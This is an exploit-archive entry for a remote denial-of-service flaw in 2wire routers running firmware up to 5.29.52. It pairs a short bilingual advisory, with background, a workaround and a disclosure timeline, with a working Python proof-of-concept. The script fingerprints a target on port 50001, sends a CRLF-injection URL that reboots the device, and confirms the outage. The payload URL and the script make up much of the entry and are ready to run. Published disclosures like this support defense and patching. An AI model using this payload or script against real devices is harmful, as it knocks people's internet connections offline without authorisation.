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2WIRE Router <= 5.29.52 Remote DoS
================================== 2wire Router <= 5.29.52 Remote DoS ================================== # Title: 2wire Router <= 5.29.52 Remote DoS # CVE-ID: () # OSVDB-ID: () # Author: hkm # Published: 2009-10-29 # Verified: yes view source print? """ ======================================== 2WIRE REMOTE DENIAL OF SERVICE ======================================== Device: 2wire Gateway Router/Modem Vulnerable Software: < 5.29.52 Vulnerable Models: 1700HG 1701HG 1800HW 2071 2700HG 2701HG-T Release Date: 2009-09-00 Last Update: 2009-09-00 Critical: Moderately critical Impact: Denial of service Remote router reboot Where: From remote In the remote management interface Solution Status: Vendor issued firmware patches Providers are in charge of applying the patches WebVuln Advisory: 1-003 BACKGROUND ======================= The remote management interface of some 2wire modems is enabled by default. This interface runs over SSL on port 50001 with an untrusted issuer certificate. ++Espa?ol Algunos m?dems 2wire tienen la interfaz remota habilitada por default. La interfaz utiliza SSL con un certificado invalido en el puerto 50001. DESCRIPTION ======================= Some 2wire modems are vulnerable to a remote denial of service attack. By requesting a special url from the Remote Management interface, an unathenticated user can remotely reboot the complete device. ++ Algunos m?dems 2wire son vulnerables a un ataque de denegaci?n de servicio. Un usuario no autenticado puede reiniciar el dispositivo enviando una petici?n a la interfaz de Administraci?n remota. EXPLOIT / POC ======================= https://<remoteIP>:50001/xslt?page=%0d%0a WORKAROUND ======================= Disable Remote Management in Firewall -> Advanced Settings. ++ Deshabilitar Administraci?n remota en Cortafuegos -> Configuraci?n avanzada DISCLOSURE TIMELINE ======================= 2009/09/06 - Vulnerability discovered 2009/09/08 - Vendor contacted ======================= h k m hkm@hakim.ws http://www.hakim.ws ======================= Greets: preth00nker, DromoroK, mr.ebola, Javier, d0ct0r_4rz0v1zp0, ch@vez, fito, HL, Xianur0, Pr@fEs0r X, Daemon. REFERENCES ======================= Preth00nker's exploit (LAN) - http://www.milw0rm.com/exploits/2246 2Wire Gateways CRLF DoS (from local network) - http://secunia.com/advisories/21583 Hakim.Ws - http://www.hakim.ws WebVuln - http://www.webvuln.com""" # POC #======================= print "\n #################################################" print " # 2WIRE REMOTE DoS (FW =< 5.29.52) #" print " # #" print " # hkm@hakim.ws #" print " #################################################\n" import socket, sys, urllib2 socket.setdefaulttimeout(4) try: ip = sys.argv[1] except: print " [IP ERROR] -> python 2os.py\n" sys.exit() if not len(ip.split(".")) == 4: print " [IP ERROR] -> python 2os.py\n" sys.exit() print " [ ] Detectando el dispositivo" try: server = str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=CD35_SETUP_01")).info()) print " [+] Detectado "+server[int(server.find("Server:"))+8:int(server.find("\n",int(server.find("Server:"))))] except: print " [-] No detectado\n" sys.exit() print " [ ] Lanzando el ataque" try: str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=%0d%0a")).read()) except: pass try: server = str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=CD35_SETUP_01")).info()) print " [-] No vulnerable\n" except: print " [+] MODEM RESETADO! EAEA!\n" sys.exit() # 0day.today [2024-12-27] #